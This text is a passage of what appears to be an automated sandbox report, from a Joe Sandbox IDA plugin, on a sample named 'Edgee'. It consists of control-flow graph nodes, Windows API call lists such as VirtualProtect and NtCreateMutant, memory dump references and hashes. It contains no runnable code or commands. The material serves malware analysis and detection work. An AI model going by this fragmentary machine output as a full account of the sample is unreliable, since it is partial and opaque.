7ff6d96d1d40 653->658 659 7ff6d96d1a9d-7ff6d96d1afa 653->659 656->630 656->652 657->656 658->646 664 7ff6d96d1b22-7ff6d96d1b26 659->664 665 7ff6d96d1afc-7ff6d96d1b0e 659->665 668 7ff6d96d1a70-7ff6d96d1a77 664->668 669 7ff6d96d1b2c-7ff6d96d1b30 664->669 666 7ff6d96d1b10-7ff6d96d1b20 665->666 667 7ff6d96d1b5c-7ff6d96d1b6f call 7ff6d96d1d40 665->667 666->664 666->667 667->658 668->643 668->653 669->668 670 7ff6d96d1b36-7ff6d96d1b53 call 7ff6d96d1ba0 669->670 670->667
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D96D1247), ref: 00007FF6D96D19F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                        • API String ID: 544645111-395989641
                                                                        • Opcode ID: cf4a0938d5745cf3f0d050ff4f8884fc30c6aa4c67ca2699eb88dc176e313b6a
                                                                        • Instruction ID: 140ad06cbdac05139814047b9a1c0dbb7fecd5b6ea390b75d4d3acac97170326
                                                                        • Opcode Fuzzy Hash: cf4a0938d5745cf3f0d050ff4f8884fc30c6aa4c67ca2699eb88dc176e313b6a
                                                                        • Instruction Fuzzy Hash: 12519E21E08586C6FB148F62D8447BC2361AB85BA8F294133D92C87794CF7CE8A2E700

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 674 7ff6d96d1800-7ff6d96d1810 675 7ff6d96d1812-7ff6d96d1822 674->675 676 7ff6d96d1824 674->676 677 7ff6d96d182b-7ff6d96d1867 call 7ff6d96d2290 fprintf 675->677 676->677
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: fprintf
                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                        • API String ID: 383729395-3474627141
                                                                        • Opcode ID: 49f4af4bda1f1a1e2ab7baa5fcfb1583464bebbd0c41258c396d4a3718496155
                                                                        • Instruction ID: bb449a8267ea631960828aff5492b985b63ca94eca4fb98afc64f76bb2fcf579
                                                                        • Opcode Fuzzy Hash: 49f4af4bda1f1a1e2ab7baa5fcfb1583464bebbd0c41258c396d4a3718496155
                                                                        • Instruction Fuzzy Hash: D1F06221E18AC582F621DF24A9410BD6360EB9A7C1F659232EE5DD7751DF2CF1A69300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                        • String ID:
                                                                        • API String ID: 682475483-0
                                                                        • Opcode ID: 8aa54c0fbd7215a94801c4dad15e2e96f0e494586a06395055d78c8bab4265d9
                                                                        • Instruction ID: 2f7a9a09fc26cc53272cf9a6b2a5cbfc86b191dff6f4b460f7e6852a66ff97ca
                                                                        • Opcode Fuzzy Hash: 8aa54c0fbd7215a94801c4dad15e2e96f0e494586a06395055d78c8bab4265d9
                                                                        • Instruction Fuzzy Hash: 1C01DE25A0968281FA958F11ED4427D1360BF85B95F685033CA2DC7B94DF3CE975E300

                                                                        Execution Graph

                                                                        Execution Coverage:2.5%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:859
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 2830 140001ac3 2831 140001a70 2830->2831 2832 140001b36 2831->2832 2833 14000199e 2831->2833 2836 140001b53 2831->2836 2835 140001ba0 4 API calls 2832->2835 2834 140001a0f 2833->2834 2837 1400019e9 VirtualProtect 2833->2837 2835->2836 2837->2833 1973 140001ae4 1975 140001a70 1973->1975 1974 140001b36 1981 140001ba0 1974->1981 1975->1974 1976 14000199e 1975->1976 1979 140001b53 1975->1979 1977 140001a0f 1976->1977 1980 1400019e9 VirtualProtect 1976->1980 1980->1976 1984 140001bc2 1981->1984 1982 140001c04 memcpy 1982->1979 1984->1982 1985 140001c45 VirtualQuery 1984->1985 1986 140001cf4 1984->1986 1985->1986 1990 140001c72 1985->1990 1987 140001d23 GetLastError 1986->1987 1989 140001d37 1987->1989 1988 140001ca4 VirtualProtect 1988->1982 1988->1987 1990->1982 1990->1988 2018 140001404 2091 140001394 2018->2091 2020 140001413 2021 140001394 2 API calls 2020->2021 2022 140001422 2021->2022 2023 140001394 2 API calls 2022->2023 2024 140001431 2023->2024 2025 140001394 2 API calls 2024->2025 2026 140001440 2025->2026 2027 140001394 2 API calls 2026->2027 2028 14000144f 2027->2028 2029 140001394 2 API calls 2028->2029 2030 14000145e 2029->2030 2031 140001394 2 API calls 2030->2031 2032 14000146d 2031->2032 2033 140001394 2 API calls 2032->2033 2034 14000147c 2033->2034 2035 140001394 2 API calls 2034->2035 2036 14000148b 2035->2036 2037 140001394 2 API calls 2036->2037 2038 14000149a 2037->2038 2039 140001394 2 API calls 2038->2039 2040 1400014a9 2039->2040 2041 140001394 2 API calls 2040->2041 2042 1400014b8 2041->2042 2043 140001394 2 API calls 2042->2043 2044 1400014c7 2043->2044 2045 140001394 2 API calls 2044->2045 2046 1400014d6 2045->2046 2047 1400014e5 2046->2047 2048 140001394 2 API calls 2046->2048 2049 140001394 2 API calls 2047->2049 2048->2047 2050 1400014ef 2049->2050 2051 1400014f4 2050->2051 2052 140001394 2 API calls 2050->2052 2053 140001394 2 API calls 2051->2053 2052->2051 2054 1400014fe 2053->2054 2055 140001503 2054->2055 2056 140001394 2 API calls 2054->2056 2057 140001394 2 API calls 2055->2057 2056->2055 2058 14000150d 2057->2058 2059 140001394 2 API calls 2058->2059 2060 140001512 2059->2060 2061 140001394 2 API calls 2060->2061 2062 140001521 2061->2062 2063 140001394 2 API calls 2062->2063 2064 140001530 2063->2064 2065 140001394 2 API calls 2064->2065 2066 14000153f 2065->2066 2067 140001394 2 API calls 2066->2067 2068 14000154e 2067->2068 2069 140001394 2 API calls 2068->2069 2070 14000155d 2069->2070 2071 140001394 2 API calls 2070->2071 2072 14000156c 2071->2072 2073 140001394 2 API calls 2072->2073 2074 14000157b 2073->2074 2075 140001394 2 API calls 2074->2075 2076 14000158a 2075->2076 2077 140001394 2 API calls 2076->2077 2078 140001599 2077->2078 2079 140001394 2 API calls 2078->2079 2080 1400015a8 2079->2080 2081 140001394 2 API calls 2080->2081 2082 1400015b7 2081->2082 2083 140001394 2 API calls 2082->2083 2084 1400015c6 2083->2084 2085 140001394 2 API calls 2084->2085 2086 1400015d5 2085->2086 2087 140001394 2 API calls 2086->2087 2088 1400015e4 2087->2088 2089 140001394 2 API calls 2088->2089 2090 1400015f3 2089->2090 2092 140005750 malloc 2091->2092 2093 1400013b8 2092->2093 2094 1400013c6 NtCreateMutant 2093->2094 2094->2020 2095 140002104 2096 140002111 EnterCriticalSection 2095->2096 2097 140002218 2095->2097 2098 14000220b LeaveCriticalSection 2096->2098 2099 14000212e 2096->2099 2100 140002272 2097->2100 2102 140002241 DeleteCriticalSection 2097->2102 2103 140002230 free 2097->2103 2098->2097 2099->2098 2101 14000214d TlsGetValue GetLastError 2099->2101 2101->2099 2102->2100 2103->2102 2103->2103 1991 140001e65 1992 140001e67 signal 1991->1992 1993 140001e99 1992->1993 1994 140001e7c 1992->1994 1994->1993 1995 140001e82 signal 1994->1995 1995->1993 2838 140001f47 2839 140001e67 signal 2838->2839 2842 140001e99 2838->2842 2840 140001e7c 2839->2840 2839->2842 2841 140001e82 signal 2840->2841 2840->2842 2841->2842 1996 14000216f 1997 140002185 1996->1997 1998 140002178 InitializeCriticalSection 1996->1998 1998->1997 1999 140001a70 2000 14000199e 1999->2000 2004 140001a7d 1999->2004 2001 140001a0f 2000->2001 2002 1400019e9 VirtualProtect 2000->2002 2002->2000 2003 140001b53 2004->1999 2004->2003 2005 140001b36 2004->2005 2006 140001ba0 4 API calls 2005->2006 2006->2003 2104 140001e10 2105 140001e2f 2104->2105 2106 140001e55 2105->2106 2107 140001ecc 2105->2107 2111 140001eb5 2105->2111 2106->2111 2112 140001f12 signal 2106->2112 2108 140001ed3 signal 2107->2108 2107->2111 2109 140001ee4 2108->2109 2108->2111 2110 140001eea signal 2109->2110 2109->2111 2110->2111 2112->2111 2843 140002050 2844 14000205e EnterCriticalSection 2843->2844 2845 1400020cf 2843->2845 2846 1400020c2 LeaveCriticalSection 2844->2846 2847 140002079 2844->2847 2846->2845 2847->2846 2848 1400020bd free 2847->2848 2848->2846 2849 140001fd0 2850 140001fe4 2849->2850 2851 140002033 2849->2851 2850->2851 2852 140001ffd EnterCriticalSection LeaveCriticalSection 2850->2852 2852->2851 2121 140001ab3 2126 140001a70 2121->2126 2122 140001b36 2125 140001ba0 4 API calls 2122->2125 2123 14000199e 2124 140001a0f 2123->2124 2128 1400019e9 VirtualProtect 2123->2128 2127 140001b53 2125->2127 2126->2121 2126->2122 2126->2123 2126->2127 2128->2123 1963 140001394 1967 140005750 1963->1967 1965 1400013b8 1966 1400013c6 NtCreateMutant 1965->1966 1968 14000576e 1967->1968 1971 14000579b 1967->1971 1968->1965 1969 140005843 1970 14000585f malloc 1969->1970 1972 140005880 1970->1972 1971->1968 1971->1969 1972->1968 2113 14000219e 2114 140002272 2113->2114 2115 1400021ab EnterCriticalSection 2113->2115 2116 140002265 LeaveCriticalSection 2115->2116 2117 1400021c8 2115->2117 2116->2114 2117->2116 2118 1400021e9 TlsGetValue GetLastError 2117->2118 2118->2117 2007 140001800 2008 140001812 2007->2008 2009 140001835 fprintf 2008->2009 2010 140001000 2011 14000108b __set_app_type 2010->2011 2012 140001040 2010->2012 2014 1400010b6 2011->2014 2012->2011 2013 1400010e5 2014->2013 2016 140001e00 2014->2016 2017 140005ce0 __setusermatherr 2016->2017 2119 140002320 strlen 2120 140002337 2119->2120 2129 140001140 2132 140001160 2129->2132 2131 140001156 2133 1400011b9 2132->2133 2134 14000118b 2132->2134 2135 1400011d3 2133->2135 2136 1400011c7 _amsg_exit 2133->2136 2134->2133 2137 1400011a0 Sleep 2134->2137 2138 140001201 _initterm 2135->2138 2139 14000121a 2135->2139 2136->2135 2137->2133 2137->2134 2138->2139 2155 140001880 2139->2155 2142 14000126a 2143 14000126f malloc 2142->2143 2144 14000128b 2143->2144 2146 1400012d0 2143->2146 2145 1400012a0 strlen malloc memcpy 2144->2145 2145->2145 2145->2146 2166 140003170 2146->2166 2148 140001315 2149 140001344 2148->2149 2150 140001324 2148->2150 2153 140001160 66 API calls 2149->2153 2151 140001338 2150->2151 2152 14000132d _cexit 2150->2152 2151->2131 2152->2151 2154 140001366 2153->2154 2154->2131 2156 140001247 SetUnhandledExceptionFilter 2155->2156 2157 1400018a2 2155->2157 2156->2142 2157->2156 2162 14000194d 2157->2162 2163 140001a20 2157->2163 2158 14000199e 2158->2156 2161 1400019e9 VirtualProtect 2158->2161 2159 140001ba0 4 API calls 2159->2162 2160 140001b53 2161->2158 2162->2158 2162->2159 2163->2158 2163->2160 2164 140001b36 2163->2164 2165 140001ba0 4 API calls 2164->2165 2165->2160 2169 140003186 2166->2169 2167 14000326d wcslen 2250 14000153f 2167->2250 2169->2167 2171 14000346e 2171->2148 2174 140003368 2177 14000338e memset 2174->2177 2179 1400033c0 2177->2179 2180 140003410 wcslen 2179->2180 2181 140003426 2180->2181 2185 14000346c 2180->2185 2182 140003440 _wcsnicmp 2181->2182 2183 140003456 wcslen 2182->2183 2182->2185 2183->2182 2183->2185 2184 140003531 wcscpy wcscat memset 2187 140003570 2184->2187 2185->2184 2186 1400035b3 wcscpy wcscat memset 2188 1400035f6 2186->2188 2187->2186 2189 1400036fe wcscpy wcscat memset 2188->2189 2190 140003740 2189->2190 2191 140003a88 wcslen 2190->2191 2192 140003a96 2191->2192 2196 140003acb 2191->2196 2193 140003aa0 _wcsnicmp 2192->2193 2194 140003ab6 wcslen 2193->2194 2193->2196 2194->2193 2194->2196 2195 140003b55 wcscpy wcscat memset 2197 140003b97 2195->2197 2196->2195 2198 140003bda wcscpy wcscat memset 2197->2198 2199 140003c20 2198->2199 2200 140003c50 wcscpy wcscat memset 2199->2200 2202 140003ca4 2200->2202 2201 140003ce9 wcscpy wcscat wcslen 2390 14000146d 2201->2390 2202->2201 2205 140003e9e 2210 140003f53 memset 2205->2210 2208 140003f33 2212 14000145e 2 API calls 2208->2212 2209 140003e06 2476 1400014a9 2209->2476 2213 140005457 2210->2213 2214 140003f77 wcscpy wcscat wcslen 2210->2214 2212->2205 2240 1400040a0 2214->2240 2217 140003f22 2219 14000145e 2 API calls 2217->2219 2219->2205 2222 140003e92 2224 14000145e 2 API calls 2222->2224 2223 14000418e wcslen 2225 14000153f 2 API calls 2223->2225 2224->2205 2225->2240 2226 14000435a wcslen 2637 14000157b 2226->2637 2227 1400045cd wcslen 2228 14000153f 2 API calls 2227->2228 2228->2240 2230 1400043e8 memset 2230->2240 2231 140004452 wcslen 2654 1400015a8 2231->2654 2234 1400051df memcpy 2234->2240 2235 1400044ba _wcsnicmp 2235->2240 2236 140004acd memset 2239 140004ce0 memset 2236->2239 2236->2240 2237 14000145e NtCreateMutant malloc 2237->2240 2238 1400026e0 11 API calls 2238->2240 2239->2240 2240->2223 2240->2226 2240->2227 2240->2230 2240->2231 2240->2234 2240->2235 2240->2236 2240->2237 2240->2238 2240->2239 2241 140004f2d wcslen 2240->2241 2242 140004b3b memset 2240->2242 2243 140004d3e wcscpy wcscat wcslen 2240->2243 2246 140004b95 wcscpy wcscat wcslen 2240->2246 2249 140004e82 2240->2249 2592 1400014d6 2240->2592 2665 140001521 2240->2665 2763 140001431 2240->2763 2244 1400015a8 2 API calls 2241->2244 2242->2240 2245 140001422 2 API calls 2243->2245 2244->2240 2245->2240 2694 140001422 2246->2694 2249->2148 2251 140001394 2 API calls 2250->2251 2252 14000154e 2251->2252 2253 140001394 2 API calls 2252->2253 2254 14000155d 2253->2254 2255 140001394 2 API calls 2254->2255 2256 14000156c 2255->2256 2257 140001394 2 API calls 2256->2257 2258 14000157b 2257->2258 2259 140001394 2 API calls 2258->2259 2260 14000158a 2259->2260 2261 140001394 2 API calls 2260->2261 2262 140001599 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015a8 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015b7 2265->2266 2267 140001394 2 API calls 2266->2267 2268 1400015c6 2267->2268 2269 140001394 2 API calls 2268->2269 2270 1400015d5 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015e4 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015f3 2273->2274 2274->2171 2275 140001503 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000150d 2276->2277 2278 140001394 2 API calls 2277->2278 2279 140001512 2278->2279 2280 140001394 2 API calls 2279->2280 2281 140001521 2280->2281 2282 140001394 2 API calls 2281->2282 2283 140001530 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000153f 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000154e 2286->2287 2288 140001394 2 API calls 2287->2288 2289 14000155d 2288->2289 2290 140001394 2 API calls 2289->2290 2291 14000156c 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000157b 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000158a 2294->2295 2296 140001394 2 API calls 2295->2296 2297 140001599 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015a8 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015b7 2300->2301 2302 140001394 2 API calls 2301->2302 2303 1400015c6 2302->2303 2304 140001394 2 API calls 2303->2304 2305 1400015d5 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015e4 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015f3 2308->2309 2309->2174 2310 14000156c 2309->2310 2311 140001394 2 API calls 2310->2311 2312 14000157b 2311->2312 2313 140001394 2 API calls 2312->2313 2314 14000158a 2313->2314 2315 140001394 2 API calls 2314->2315 2316 140001599 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015a8 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015b7 2319->2320 2321 140001394 2 API calls 2320->2321 2322 1400015c6 2321->2322 2323 140001394 2 API calls 2322->2323 2324 1400015d5 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015e4 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015f3 2327->2328 2328->2174 2329 14000145e 2328->2329 2330 140001394 2 API calls 2329->2330 2331 14000146d 2330->2331 2332 140001394 2 API calls 2331->2332 2333 14000147c 2332->2333 2334 140001394 2 API calls 2333->2334 2335 14000148b 2334->2335 2336 140001394 2 API calls 2335->2336 2337 14000149a 2336->2337 2338 140001394 2 API calls 2337->2338 2339 1400014a9 2338->2339 2340 140001394 2 API calls 2339->2340 2341 1400014b8 2340->2341 2342 140001394 2 API calls 2341->2342 2343 1400014c7 2342->2343 2344 140001394 2 API calls 2343->2344 2345 1400014d6 2344->2345 2346 1400014e5 2345->2346 2347 140001394 2 API calls 2345->2347 2348 140001394 2 API calls 2346->2348 2347->2346 2349 1400014ef 2348->2349 2350 1400014f4 2349->2350 2351 140001394 2 API calls 2349->2351 2352 140001394 2 API calls 2350->2352 2351->2350 2353 1400014fe 2352->2353 2354 140001503 2353->2354 2355 140001394 2 API calls 2353->2355 2356 140001394 2 API calls 2354->2356 2355->2354 2357 14000150d 2356->2357 2358 140001394 2 API calls 2357->2358 2359 140001512 2358->2359 2360 140001394 2 API calls 2359->2360 2361 140001521 2360->2361 2362 140001394 2 API calls 2361->2362 2363 140001530 2362->2363 2364 140001394 2 API calls 2363->2364 2365 14000153f 2364->2365 2366 140001394 2 API calls 2365->2366 2367 14000154e 2366->2367 2368 140001394 2 API calls 2367->2368 2369 14000155d 2368->2369 2370 140001394 2 API calls 2369->2370 2371 14000156c 2370->2371 2372 140001394 2 API calls 2371->2372 2373 14000157b 2372->2373 2374 140001394 2 API calls 2373->2374 2375 14000158a 2374->2375 2376 140001394 2 API calls 2375->2376 2377 140001599 2376->2377 2378 140001394 2 API calls 2377->2378 2379 1400015a8 2378->2379 2380 140001394 2 API calls 2379->2380 2381 1400015b7 2380->2381 2382 140001394 2 API calls 2381->2382 2383 1400015c6 2382->2383 2384 140001394 2 API calls 2383->2384 2385 1400015d5 2384->2385 2386 140001394 2 API calls 2385->2386 2387 1400015e4 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015f3 2388->2389 2389->2174 2391 140001394 2 API calls 2390->2391 2392 14000147c 2391->2392 2393 140001394 2 API calls 2392->2393 2394 14000148b 2393->2394 2395 140001394 2 API calls 2394->2395 2396 14000149a 2395->2396 2397 140001394 2 API calls 2396->2397 2398 1400014a9 2397->2398 2399 140001394 2 API calls 2398->2399 2400 1400014b8 2399->2400 2401 140001394 2 API calls 2400->2401 2402 1400014c7 2401->2402 2403 140001394 2 API calls 2402->2403 2404 1400014d6 2403->2404 2405 1400014e5 2404->2405 2406 140001394 2 API calls 2404->2406 2407 140001394 2 API calls 2405->2407 2406->2405 2408 1400014ef 2407->2408 2409 1400014f4 2408->2409 2410 140001394 2 API calls 2408->2410 2411 140001394 2 API calls 2409->2411 2410->2409 2412 1400014fe 2411->2412 2413 140001503 2412->2413 2414 140001394 2 API calls 2412->2414 2415 140001394 2 API calls 2413->2415 2414->2413 2416 14000150d 2415->2416 2417 140001394 2 API calls 2416->2417 2418 140001512 2417->2418 2419 140001394 2 API calls 2418->2419 2420 140001521 2419->2420 2421 140001394 2 API calls 2420->2421 2422 140001530 2421->2422 2423 140001394 2 API calls 2422->2423 2424 14000153f 2423->2424 2425 140001394 2 API calls 2424->2425 2426 14000154e 2425->2426 2427 140001394 2 API calls 2426->2427 2428 14000155d 2427->2428 2429 140001394 2 API calls 2428->2429 2430 14000156c 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000157b 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000158a 2433->2434 2435 140001394 2 API calls 2434->2435 2436 140001599 2435->2436 2437 140001394 2 API calls 2436->2437 2438 1400015a8 2437->2438 2439 140001394 2 API calls 2438->2439 2440 1400015b7 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015c6 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015d5 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015e4 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015f3 2447->2448 2448->2205 2449 140001530 2448->2449 2450 140001394 2 API calls 2449->2450 2451 14000153f 2450->2451 2452 140001394 2 API calls 2451->2452 2453 14000154e 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000155d 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000156c 2456->2457 2458 140001394 2 API calls 2457->2458 2459 14000157b 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000158a 2460->2461 2462 140001394 2 API calls 2461->2462 2463 140001599 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015a8 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015b7 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015c6 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015d5 2470->2471 2472 140001394 2 API calls 2471->2472 2473 1400015e4 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015f3 2474->2475 2475->2208 2475->2209 2477 140001394 2 API calls 2476->2477 2478 1400014b8 2477->2478 2479 140001394 2 API calls 2478->2479 2480 1400014c7 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014d6 2481->2482 2483 1400014e5 2482->2483 2484 140001394 2 API calls 2482->2484 2485 140001394 2 API calls 2483->2485 2484->2483 2486 1400014ef 2485->2486 2487 1400014f4 2486->2487 2488 140001394 2 API calls 2486->2488 2489 140001394 2 API calls 2487->2489 2488->2487 2490 1400014fe 2489->2490 2491 140001503 2490->2491 2492 140001394 2 API calls 2490->2492 2493 140001394 2 API calls 2491->2493 2492->2491 2494 14000150d 2493->2494 2495 140001394 2 API calls 2494->2495 2496 140001512 2495->2496 2497 140001394 2 API calls 2496->2497 2498 140001521 2497->2498 2499 140001394 2 API calls 2498->2499 2500 140001530 2499->2500 2501 140001394 2 API calls 2500->2501 2502 14000153f 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000154e 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000155d 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000156c 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000157b 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000158a 2511->2512 2513 140001394 2 API calls 2512->2513 2514 140001599 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015a8 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015b7 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015c6 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015d5 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015e4 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015f3 2525->2526 2526->2217 2527 140001440 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000144f 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000145e 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000146d 2532->2533 2534 140001394 2 API calls 2533->2534 2535 14000147c 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000148b 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000149a 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014a9 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400014b8 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400014c7 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400014d6 2546->2547 2548 1400014e5 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 1400014ef 2550->2551 2552 1400014f4 2551->2552 2553 140001394 2 API calls 2551->2553 2554 140001394 2 API calls 2552->2554 2553->2552 2555 1400014fe 2554->2555 2556 140001503 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 14000150d 2558->2559 2560 140001394 2 API calls 2559->2560 2561 140001512 2560->2561 2562 140001394 2 API calls 2561->2562 2563 140001521 2562->2563 2564 140001394 2 API calls 2563->2564 2565 140001530 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000153f 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000154e 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000155d 2570->2571 2572 140001394 2 API calls 2571->2572 2573 14000156c 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000157b 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000158a 2576->2577 2578 140001394 2 API calls 2577->2578 2579 140001599 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015a8 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015b7 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015c6 2584->2585 2586 140001394 2 API calls 2585->2586 2587 1400015d5 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015e4 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015f3 2590->2591 2591->2217 2591->2222 2593 1400014e5 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014ef 2595->2596 2597 1400014f4 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 1400014fe 2599->2600 2601 140001503 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 14000150d 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001512 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001521 2607->2608 2609 140001394 2 API calls 2608->2609 2610 140001530 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000153f 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000154e 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000155d 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000156c 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000157b 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000158a 2621->2622 2623 140001394 2 API calls 2622->2623 2624 140001599 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015a8 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015b7 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015c6 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015d5 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015e4 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015f3 2635->2636 2636->2240 2638 140001394 2 API calls 2637->2638 2639 14000158a 2638->2639 2640 140001394 2 API calls 2639->2640 2641 140001599 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015a8 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015b7 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015c6 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015d5 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015e4 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015f3 2652->2653 2653->2240 2655 140001394 2 API calls 2654->2655 2656 1400015b7 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015c6 2657->2658 2659 